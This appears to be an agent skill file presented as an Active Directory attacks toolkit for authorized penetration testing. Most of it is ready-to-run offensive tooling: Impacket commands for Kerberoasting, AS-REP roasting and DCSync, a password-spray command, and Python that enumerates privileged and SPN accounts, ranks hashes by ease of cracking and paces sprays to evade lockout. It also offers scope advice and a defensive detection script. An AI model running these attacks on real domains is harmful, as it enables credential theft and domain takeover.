
Active Directory Attacks Toolkit


Skill | Cliptics | security | v1.0.0 | MIT

Active Directory Attacks Toolkit

Conduct authorized security assessments of Microsoft Active Directory environments. This skill covers AD reconnaissance, credential harvesting, Kerberos attack techniques, lateral movement, privilege escalation, and domain persistence — all within the context of authorized penetration testing engagements.

When to Use This Skill

Choose Active Directory Attacks Toolkit when you need to:

  • Perform authorized penetration tests against Active Directory domains
  • Identify misconfigurations in AD that could lead to domain compromise
  • Test Kerberos authentication security (Kerberoasting, AS-REP roasting)
  • Validate detection capabilities for AD attack techniques in purple team exercises

Consider alternatives when:

  • You need to harden AD configurations defensively (use Microsoft security baselines)
  • You need cloud identity testing (use Azure AD/Entra ID security tools)
  • You need network-layer penetration testing (use general network pentest tools)

Quick Start

```bash
# Install key tools (Kali Linux or authorized testing platform)
sudo apt install bloodhound neo4j ldap-utils smbclient
pip install impacket ldap3 bloodhound-python
```

```python
# AD Enumeration with ldap3 (authorized testing only)
from ldap3 import Server, Connection, ALL, NTLM, SUBTREE


def enumerate_ad(dc_ip, domain, username, password):
    """Enumerate Active Directory objects via LDAP."""
    server = Server(dc_ip, get_info=ALL)
    # NTLM bind rather than a simple bind, so the test account's password is
    # not sent in cleartext over LDAP/389 (use_ssl=True for LDAPS is better still)
    conn = Connection(
        server,
        user=f"{domain}\\{username}",
        password=password,
        authentication=NTLM,
        auto_bind=True,
    )
    base_dn = ','.join(f'DC={part}' for part in domain.split('.'))

    # Find domain admins
    conn.search(
        base_dn,
        '(&(objectClass=group)(cn=Domain Admins))',
        search_scope=SUBTREE,
        attributes=['member'],
    )
    if conn.entries:
        print("Domain Admins:")
        for member in conn.entries[0].member.values:
            cn = member.split(',')[0].replace('CN=', '')
            print(f"  - {cn}")

    # Find computers
    conn.search(
        base_dn,
        '(objectClass=computer)',
        search_scope=SUBTREE,
        attributes=['cn', 'operatingSystem', 'lastLogonTimestamp'],
    )
    print(f"\nComputers found: {len(conn.entries)}")
    for entry in conn.entries[:5]:
        print(f"  {entry.cn}: {entry.operatingSystem}")

    # Find SPNs (potential Kerberoasting targets). Computer objects also carry
    # objectClass=user, so they are excluded explicitly, as is krbtgt.
    conn.search(
        base_dn,
        '(&(objectClass=user)(servicePrincipalName=*)'
        '(!(objectClass=computer))(!(sAMAccountName=krbtgt)))',
        search_scope=SUBTREE,
        attributes=['cn', 'servicePrincipalName', 'memberOf'],
    )
    print(f"\nAccounts with SPNs (Kerberoasting targets): {len(conn.entries)}")
    for entry in conn.entries:
        print(f"  {entry.cn}: {entry.servicePrincipalName}")

    conn.unbind()


# enumerate_ad('192.168.1.10', 'corp.local', 'testuser', 'TestPass123')
```

Core Concepts

AD Attack Phases

| Phase                 | Techniques                                        | Tools                              |
|-----------------------|---------------------------------------------------|------------------------------------|
| Reconnaissance        | LDAP enumeration, DNS queries, SMB enumeration    | ldapsearch, BloodHound, enum4linux |
| Credential Harvesting | Kerberoasting, AS-REP roasting, password spraying | Impacket, Rubeus, CrackMapExec     |
| Lateral Movement      | Pass-the-hash, overpass-the-hash, WMI/PSExec      | Impacket, Mimikatz, Evil-WinRM     |
| Privilege Escalation  | ACL abuse, GPO exploitation, delegation attacks   | BloodHound, PowerView, SharpHound  |
| Domain Persistence    | Golden/Silver tickets, DCSync, skeleton key       | Mimikatz, Impacket secretsdump     |

Kerberos Attack Techniques

```bash
# All commands for AUTHORIZED testing only
# pip installs the Impacket examples as *.py scripts on PATH (GetUserSPNs.py);
# the Kali packages name them impacket-GetUserSPNs, impacket-GetNPUsers, etc.

# 1. Kerberoasting — Extract service ticket hashes
# Requires: valid domain credentials
GetUserSPNs.py corp.local/testuser:'TestPass123' \
    -dc-ip 192.168.1.10 \
    -request \
    -outputfile kerberoast_hashes.txt

# 2. AS-REP Roasting — Target accounts without pre-auth
# No credentials needed, only a list of candidate usernames
GetNPUsers.py corp.local/ \
    -dc-ip 192.168.1.10 \
    -usersfile users.txt \
    -format hashcat \
    -outputfile asrep_hashes.txt

# 3. Password Spraying — one password per round; wait out the lockout
#    observation window between rounds (see Best Practices)
# crackmapexec smb 192.168.1.10 \
#     -u users.txt -p 'Spring2025!' \
#     -d corp.local \
#     --continue-on-success

# 4. BloodHound Collection (bloodhound-python)
bloodhound-python -c All \
    -u testuser -p 'TestPass123' \
    -d corp.local \
    -dc dc01.corp.local \
    -ns 192.168.1.10

# 5. DCSync (requires replication rights — domain admin equiv)
# secretsdump.py corp.local/admin:'AdminPass'@192.168.1.10 \
#     -just-dc-ntlm
```
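The AS-REP roasting and Kerberoasting commands above take their targets from directory attributes. The Python below, an added example rather than code from the skill, triages user records by the bits that decide whether an attack is worth running: DONT_REQ_PREAUTH in userAccountControl for AS-REP roasting, msDS-SupportedEncryptionTypes for whether a Kerberoast will yield a fast-to-crack RC4 ticket or a slow AES one, and pwdLastSet for password age. The records are constructed to look like the attribute dicts an ldap3 search returns; the record shape, the `triage` function, and the assumption that an unset msDS-SupportedEncryptionTypes still allows an RC4 service ticket are assumptions of this example.

```python
"""Kerberos target triage from LDAP attributes (added example, not the skill's code).

Records are constructed to mirror the attributes an ldap3 user search returns
(sAMAccountName, userAccountControl, servicePrincipalName,
msDS-SupportedEncryptionTypes, pwdLastSet, memberOf), so this runs offline.
"""
from datetime import datetime, timedelta, timezone

# userAccountControl bits (MS-ADTS)
UAC_ACCOUNTDISABLE = 0x0002
UAC_DONT_EXPIRE_PASSWORD = 0x10000
UAC_DONT_REQ_PREAUTH = 0x400000

# msDS-SupportedEncryptionTypes bits (MS-KILE)
ENC_RC4_HMAC = 0x04
ENC_AES128 = 0x08
ENC_AES256 = 0x10

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_dt(ticks):
    """pwdLastSet is a FILETIME: 100-ns ticks since 1601-01-01 UTC (0 = never set)."""
    return EPOCH_1601 + timedelta(microseconds=ticks // 10) if ticks else None


def dt_to_filetime(dt):
    """Inverse of filetime_to_dt; used only to build the constructed sample."""
    d = dt - EPOCH_1601
    return (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10


def is_asrep_roastable(uac):
    """AS-REP roasting needs DONT_REQ_PREAUTH on an enabled account."""
    return bool(uac & UAC_DONT_REQ_PREAUTH) and not uac & UAC_ACCOUNTDISABLE


def likely_tgs_etype(enc_types):
    """Encryption a Kerberoast TGS will most likely carry.
    RC4 (etype 23) cracks orders of magnitude faster than AES (17/18).
    Assumption: an unset attribute (None/0) means the KDC still issues an RC4
    service ticket for the account, so it is classed as RC4 here."""
    if not enc_types or enc_types & ENC_RC4_HMAC:
        return "rc4"
    return "aes" if enc_types & (ENC_AES128 | ENC_AES256) else "other"


def triage(records, now):
    """Return (asrep_targets, kerberoast_targets).
    Kerberoast targets are ordered cheapest-to-crack first: RC4 before AES,
    then oldest password first (old passwords often predate the current policy)."""
    asrep, roast = [], []
    for r in records:
        uac = int(r.get("userAccountControl", 0))
        name = r["sAMAccountName"]
        if uac & UAC_ACCOUNTDISABLE:
            continue
        if is_asrep_roastable(uac):
            asrep.append(name)
        spns = r.get("servicePrincipalName") or []
        # machine accounts (name$) and krbtgt hold SPNs but are not crackable targets
        if not spns or name.endswith("$") or name.lower() == "krbtgt":
            continue
        pwd_set = filetime_to_dt(int(r.get("pwdLastSet", 0)))
        roast.append({
            "user": name,
            "etype": likely_tgs_etype(r.get("msDS-SupportedEncryptionTypes")),
            "spn_count": len(spns),
            "pwd_age_days": (now - pwd_set).days if pwd_set else None,
            "privileged": any("CN=Domain Admins" in g for g in r.get("memberOf", [])),
        })
    roast.sort(key=lambda t: (t["etype"] != "rc4", -(t["pwd_age_days"] or 0)))
    return asrep, roast


NOW = datetime(2025, 1, 1, tzinfo=timezone.utc)
SAMPLE_RECORDS = [  # constructed sample, not real directory data
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"],
     "pwdLastSet": dt_to_filetime(datetime(2019, 6, 1, tzinfo=timezone.utc)),
     "memberOf": ["CN=Domain Admins,CN=Users,DC=corp,DC=local"]},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x200,
     "servicePrincipalName": ["HTTP/web01.corp.local"],
     "msDS-SupportedEncryptionTypes": 0x18,   # AES only
     "pwdLastSet": dt_to_filetime(datetime(2024, 11, 15, tzinfo=timezone.utc))},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x400200},        # no pre-auth
    {"sAMAccountName": "old_vendor", "userAccountControl": 0x400202},  # no pre-auth, disabled
    {"sAMAccountName": "krbtgt", "userAccountControl": 0x202,
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1000,
     "servicePrincipalName": ["HOST/ws01.corp.local"]},
]

if __name__ == "__main__":
    asrep_targets, roast_targets = triage(SAMPLE_RECORDS, NOW)
    print("AS-REP roastable:", asrep_targets)
    for target in roast_targets:
        print(target)
```

Feed the output into the commands above: AS-REP names go into users.txt for GetNPUsers, and the ordered Kerberoast list tells you which hashes to crack first when GetUserSPNs -request returns both $krb5tgs$23$ (RC4) and $krb5tgs$18$ (AES) lines.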

Configuration

| Parameter             | Description                                                                                   | Default   |
|-----------------------|-----------------------------------------------------------------------------------------------|-----------|
| domain                | Target AD domain FQDN                                                                         | Required  |
| dc_ip                 | Domain controller IP address                                                                  | Required  |
| username              | Authorized test account                                                                       | Required  |
| password              | Test account password                                                                         | Required  |
| spray_delay           | Seconds between password spray rounds (raise to the domain's lockout observation window, commonly 1800) | 30 |
| lockout_threshold     | Max failed attempts before lockout (check the AD policy; 0 means no lockout)                  | 5         |
| bloodhound_collection | Collection methods (All, DCOnly, Session)                                                     | "All"     |
| hash_format           | Cracking format (hashcat, john)                                                               | "hashcat" |

Best Practices

  1. Always verify authorization scope before testing — AD attacks can disrupt production services and lock out user accounts. Confirm in writing: which domains, forests, and OUs are in scope; testing windows; emergency contacts; and whether destructive techniques (DCSync, Golden Ticket) are authorized.

  2. Check account lockout policies before password spraying — Query the domain's lockout threshold and observation window with net accounts /domain. That shows the default domain policy only; fine-grained password policies (PSOs) can apply a stricter threshold to specific groups and are listed with Get-ADFineGrainedPasswordPolicy -Filter *. Spray one password across all accounts, then wait the full observation window before the next round so badPwdCount resets. Exceeding the threshold locks legitimate users out of production systems.

  3. Use BloodHound to identify the shortest attack path — Rather than testing every possible technique, import BloodHound data and query for shortest paths to Domain Admin. This focuses the engagement on realistic attack chains and produces more actionable findings for defenders.

  4. Document every command and timestamp during testing — Maintain a detailed log of commands executed, times, source/destination IPs, and results. This is essential for incident response correlation, proving scope compliance, and writing the final penetration test report.

  5. Clean up persistence mechanisms after testing — Purge forged Golden/Silver tickets from every host where they were injected (klist purge), and remove scheduled tasks, registry modifications, or accounts created during testing. A forged Golden Ticket stays valid until the krbtgt key rotates, so recommend a double krbtgt password reset if one was created. Document any artifacts that couldn't be removed and notify the client's security team to remediate them.
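Practice 2 says to read the lockout policy and pace the spray around the observation window. The planner below, an added example and not the skill's own code, does that arithmetic: it converts the raw LDAP interval and FILETIME values, drops accounts whose current badPwdCount would reach the threshold during the window, and emits rounds with the sleep that must precede each one. The policy and user dicts are constructed to look like the attributes ldap3 returns from the domain root and from user objects; the `plan_spray` function, its round format, and the safety margin of two attempts are assumptions of this example.

```python
"""Lockout-safe password-spray planner (added example, not the skill's code).

POLICY mirrors the domain root attributes lockoutThreshold and
lockoutObservationWindow; USERS mirror per-user badPwdCount / badPasswordTime.
All values are constructed so the planner runs without a domain controller.
"""
from datetime import datetime, timedelta, timezone

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def ad_interval(value):
    """Policy intervals are stored as negative 100-ns ticks (-18000000000 = 30 min).
    ldap3 may already have converted the attribute to a timedelta; both are accepted."""
    if isinstance(value, timedelta):
        return abs(value)
    return timedelta(microseconds=abs(int(value)) // 10)


def filetime_to_dt(ticks):
    """badPasswordTime is a FILETIME: 100-ns ticks since 1601-01-01 UTC (0 = never)."""
    return EPOCH_1601 + timedelta(microseconds=ticks // 10) if ticks else None


def dt_to_filetime(dt):
    """Inverse of filetime_to_dt; used only to build the constructed sample."""
    d = dt - EPOCH_1601
    return (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10


def effective_bad_count(user, window, now):
    """badPwdCount only counts against lockout while the last failure is inside
    the observation window. Note: badPwdCount is not replicated between DCs;
    read it from the PDC emulator, which sees every failure."""
    last = filetime_to_dt(int(user.get("badPasswordTime", 0)))
    if last is None or now - last > window:
        return 0
    return int(user.get("badPwdCount", 0))


def plan_spray(policy, users, passwords, now, safety_margin=2):
    """Build spray rounds that keep every account below the lockout threshold.

    One round = one password tried against every eligible user, so each round
    costs each user one failed attempt. After `per_window` rounds the plan
    sleeps for the whole observation window so badPwdCount resets on the DC.
    Returns (rounds, skipped) where each round is
    {"password": str, "sleep_before_s": int, "users": [sAMAccountName, ...]}.
    """
    threshold = int(policy["lockoutThreshold"])
    window = ad_interval(policy["lockoutObservationWindow"])
    if threshold == 0:
        per_window = len(passwords)          # no lockout policy; still pace the spray
    else:
        per_window = max(threshold - safety_margin, 1)

    eligible, skipped = [], []
    for u in users:
        used = effective_bad_count(u, window, now)
        if threshold and used + per_window >= threshold:
            skipped.append(u["sAMAccountName"])   # would lock out within this window
        else:
            eligible.append(u["sAMAccountName"])

    rounds = []
    for i, pw in enumerate(passwords):
        sleep = int(window.total_seconds()) if (i and i % per_window == 0) else 0
        rounds.append({"password": pw, "sleep_before_s": sleep, "users": eligible})
    return rounds, skipped


NOW = datetime(2025, 3, 1, 12, 0, tzinfo=timezone.utc)
POLICY = {"lockoutThreshold": 5, "lockoutObservationWindow": -18000000000}  # constructed
USERS = [  # constructed sample accounts
    {"sAMAccountName": "alice", "badPwdCount": 0, "badPasswordTime": 0},
    {"sAMAccountName": "bob", "badPwdCount": 3,          # 3 recent failures: unsafe
     "badPasswordTime": dt_to_filetime(NOW - timedelta(minutes=5))},
    {"sAMAccountName": "carol", "badPwdCount": 4,        # stale failures: count reset
     "badPasswordTime": dt_to_filetime(NOW - timedelta(hours=2))},
]
PASSWORDS = ["Spring2025!", "Winter2024!", "Welcome1!", "Password1!",
             "Corp2025!", "Summer2024!", "Changeme1!"]

if __name__ == "__main__":
    rounds, skipped = plan_spray(POLICY, USERS, PASSWORDS, NOW)
    print("skipped (would lock out):", skipped)
    for r in rounds:
        print(f"sleep {r['sleep_before_s']:>5}s, then spray {r['password']!r} "
              f"against {len(r['users'])} users")
```

With a threshold of 5 and a 30-minute window the plan sprays three passwords, sleeps 1800 seconds, and repeats; bob is dropped because his three live failures plus three more attempts would cross the threshold, while carol's four failures fell outside the window and no longer count.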

Common Issues

Kerberoasting returns no results — No user accounts have SPNs set, or your query filter is too restrictive. Verify with LDAP: (&(objectClass=user)(servicePrincipalName=*)(!(objectClass=computer))). Computer objects also match objectClass=user and always carry SPNs, but their passwords are 120-character random strings and not practically crackable, which is why the filter excludes them.

Password spray triggers lockouts despite safe intervals — Another tester or automated system may also be testing the same accounts. Coordinate with the client to ensure no concurrent authentication testing. Also check if fine-grained password policies apply different thresholds to different OUs.

BloodHound shows no paths to Domain Admin — The collection may be incomplete: Session data comes from NetSessionEnum, which current Windows versions restrict to administrators, and the LoggedOn method needs remote registry access, so run collection with -c All using an account that holds local admin rights on the hosts in scope. Also check whether domain or forest trusts exist — the path may go through a trusted domain, which has to be collected separately.
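For the purple-team use of this skill (validating that defenders see the Kerberoasting and AS-REP roasting runs from the Quick Start), the following Python is an added example, not part of the skill, of the two detections a SOC typically has: a burst of RC4 (0x17) service-ticket requests for several distinct user service accounts from one principal (event ID 4769), and a TGT issued with PreAuthType 0 (event ID 4768). The event dicts are constructed to mirror the fields of those Windows events as a SIEM presents them; the field names, the 5-minute window, and the three-service threshold are assumptions of this example.

```python
"""Kerberoast / AS-REP roast detections over DC security events.
Added example for purple-team validation, not the skill's own code.

Events are constructed dicts mirroring Windows event IDs 4769 (TGS request)
and 4768 (TGT request); no real logs are read.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"      # TicketEncryptionType for RC4; AES tickets are 0x11 / 0x12


def is_service_account_ticket(service_name):
    """Computer accounts (name$) and the krbtgt service do not yield crackable
    Kerberoast hashes, so tickets for them are noise for this detection."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def detect_kerberoast(events, window=timedelta(minutes=5), min_services=3):
    """One principal requesting RC4 service tickets for several distinct user
    service accounts inside a short window is the classic Kerberoast pattern."""
    tgs = [e for e in events
           if e["EventID"] == 4769 and e["Status"] == "0x0"
           and e["TicketEncryptionType"].lower() == RC4_HMAC
           and is_service_account_ticket(e["ServiceName"])]
    by_source = defaultdict(list)
    for e in sorted(tgs, key=lambda e: e["TimeCreated"]):
        by_source[(e["TargetUserName"], e["IpAddress"])].append(e)

    alerts = []
    for (user, ip), evs in by_source.items():
        times = [datetime.fromisoformat(e["TimeCreated"]) for e in evs]
        best, start = set(), 0
        for end in range(len(evs)):                  # sliding window over time
            while times[end] - times[start] > window:
                start += 1
            services = {e["ServiceName"] for e in evs[start:end + 1]}
            if len(services) > len(best):
                best = services
        if len(best) >= min_services:
            alerts.append({"technique": "kerberoast", "user": user, "ip": ip,
                           "services": sorted(best)})
    return alerts


def detect_asrep_roast(events):
    """4768 with PreAuthType 0 means a TGT was issued without pre-authentication;
    with an RC4 ticket that is an AS-REP roast (or at least a roastable account)."""
    return [{"technique": "asrep_roast", "user": e["TargetUserName"], "ip": e["IpAddress"]}
            for e in events
            if e["EventID"] == 4768 and e["Status"] == "0x0"
            and e["PreAuthType"] == "0"
            and e["TicketEncryptionType"].lower() == RC4_HMAC]


def tgs(time, user, service, etype, ip="10.0.0.5"):
    """Build a constructed 4769 event for the sample below."""
    return {"EventID": 4769, "TimeCreated": time, "TargetUserName": user,
            "ServiceName": service, "TicketEncryptionType": etype,
            "Status": "0x0", "IpAddress": ip}


SAMPLE_EVENTS = [  # constructed sample events, not real log data
    tgs("2025-03-01T10:00:01", "jdoe@CORP.LOCAL", "svc_sql", "0x17"),
    tgs("2025-03-01T10:00:02", "jdoe@CORP.LOCAL", "svc_web", "0x17"),
    tgs("2025-03-01T10:00:02", "jdoe@CORP.LOCAL", "FS01$", "0x17"),   # machine SPN, ignored
    tgs("2025-03-01T10:00:04", "jdoe@CORP.LOCAL", "svc_backup", "0x17"),
    tgs("2025-03-01T10:30:00", "asmith@CORP.LOCAL", "svc_sql", "0x12", ip="10.0.0.9"),  # AES, normal
    tgs("2025-03-01T10:31:00", "asmith@CORP.LOCAL", "svc_web", "0x12", ip="10.0.0.9"),
    {"EventID": 4768, "TimeCreated": "2025-03-01T10:05:00", "TargetUserName": "legacy_app",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.5"},
    {"EventID": 4768, "TimeCreated": "2025-03-01T10:06:00", "TargetUserName": "asmith",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.0.0.9"},
]

if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_EVENTS) + detect_asrep_roast(SAMPLE_EVENTS):
        print(alert)
```

During a purple-team run, compare the alerts the client's SIEM raises against what this logic flags for the same time window: a GetUserSPNs -request against three or more service accounts should produce exactly one Kerberoast alert per source, and each AS-REP-roasted account one 4768 alert. Auditing for these events must be enabled on the domain controllers (Audit Kerberos Service Ticket Operations and Audit Kerberos Authentication Service), or there is nothing to detect.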
